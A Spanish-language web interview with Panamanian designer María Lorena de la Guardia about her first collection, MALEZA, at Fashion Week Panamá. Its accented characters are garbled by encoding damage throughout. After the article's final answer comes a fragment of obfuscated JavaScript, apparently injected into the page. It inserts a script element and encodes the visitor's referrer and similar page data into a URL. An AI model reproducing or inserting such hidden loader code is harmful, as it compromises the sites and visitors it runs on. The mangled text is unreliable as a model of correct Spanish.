MarAi??a Lorena de la Guardia, cuya marca es conocida comoAi??MalorAi??, es uno de los talentos emergentes presentes este aAi??o en el Fashion Week PanamA? (FWP).

La joven de 31 aAi??os de edad, quien define su estilo como ai???sofisticado y elegante, con un toque sensual y femeninoai???, iniciA? en el mundo del diseAi??o hace apenas un aAi??o atrA?s. Pero ya promete mucho en el mundo de las costuras.

Su moda, inspirada en la danza e ideada para resaltar la sutilidad de la mujer, armoniza algunos elementos opuestos.

En la semana de la moda panameAi??a, la joven diseAi??adora lanzarA? su primera colecciA?n llamadaAi??MALEZA, en el Open House del 13 de octubre, a las 9:00 p.m. Hablamos con la joven talento sobre su estilo y su presentaciA?n en la feria de la moda mA?s importante de la regiA?n.

A?CA?mo descubriste tu gusto por la moda y cA?mo te has formado en esta industria?
El crecer en el mundo de la danza definitivamente fue un aporte positivo que despertA? mi interAi??s por el diseAi??o.

Cada baile cuenta una historia y transmite un sentimiento en el escenario. Cuando visualizo una pasarela, la imagino con la misma fuerza, capaz de transmitir todas las emociones e inspiraciA?n detrA?s de cada colecciA?n. A?Las luces, el maquillaje y los accesorios visuales que la complementan, son el toque extra para un gran show!

Ai??A?CA?mo empezaste en el mundo del diseAi??o?
IniciAi?? hace un aAi??o con varios pedidos para algunas clientas. Desde principios de junio 2016, estuve algo inquieta y con muchas ganas de iniciar con mis diseAi??os. Desde mi perspectiva, toda marca necesita de una estrategia para que cuando llegue la hora de salir de la cA?scara, todo el esfuerzo valga la pena.

Al crear MalorAi?? quise mostrar al mundo un pedacito de mAi?? y del potencial que tengo para ofrecer.

A?A estas alturas ya sientes que tienes un estilo definido? A?CA?mo lo describirAi??as?
DescribirAi??a mi estilo sofisticado y elegante, con un toque sensual y femenino; nada convencional en cuanto a los materiales que utilizo. Utilizo cortes bA?sicos y sencillos, que brindan una silueta femenina y elegante para todo tipo de cuerpo.

En realidad, no hay un estilo especAi??fico cuando se trata de atender a distintos clientes; lo ideal es siempre escuchar y hacer sentir cA?moda a la persona, siempre y cuando se agregue el toque y la esencia de MalorAi?? en cada diseAi??o.

Te estrenas como diseAi??adora en el FWP, A?quAi?? significa esta experiencia para ti?
Este evento representa para mAi?? la culminaciA?n de un sueAi??o, que es presentar mis creaciones ante un pA?blico. Fashion Week PanamA? es el espacio propicio donde podrAi?? hacer el lanzamiento oficial de mi propia marca MalorAi??. Es un privilegio y me siento honrada al tener la oportunidad de participar en este evento de interAi??s a nivel internacional.

El 13 de octubre MarAi??a Lorena De La Guardia presentarA? su colecciA?n MALEZA, como parte de su marca MalorAi??.

DescrAi??benos un poco tu colecciA?n
Para este aAi??o he decidido lanzar mi primera colecciA?n llamada MALEZA. La inspiraciA?n sale de la belleza que nos ofrece la naturaleza con sus distintos colores y texturas.

Consta de quince piezas, divididas en cuatro paletas de colores, y demuestra que lo moldeable y lo rAi??gido, lo simAi??trico y lo asimAi??trico, lo tribal y lo formal, trabajan en sinergia para crear una dinA?mica positiva entre la atracciA?n de los opuestos.

La integraciA?n de texturas no convencionales trabajadas a mano en un esquema de colores terrenales, transmitirA? la esencia de la colecciA?n.

A?QuAi?? tipo de mujer puede vestir tus prendas?

Esta colecciA?n es para la mujer que estA? muy en contacto con su lado femenino. Una mujer liberal y bohemia, pero con un toque de elegancia, a quien le gusta lo diferente y resaltar entre la gente.

A?QuAi?? viene despuAi??s del FWP para ti?

Tengo muchas aspiraciones y planes a futuro para MalorAi??. Hoy trabajo en su lanzamiento, en impulsar la marca y darme a conocer; luego, en la medida de lo posible, dAi??a a dAi??a irAi?? desarrollando varias metas trazadas para mi proyecto.

  1]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}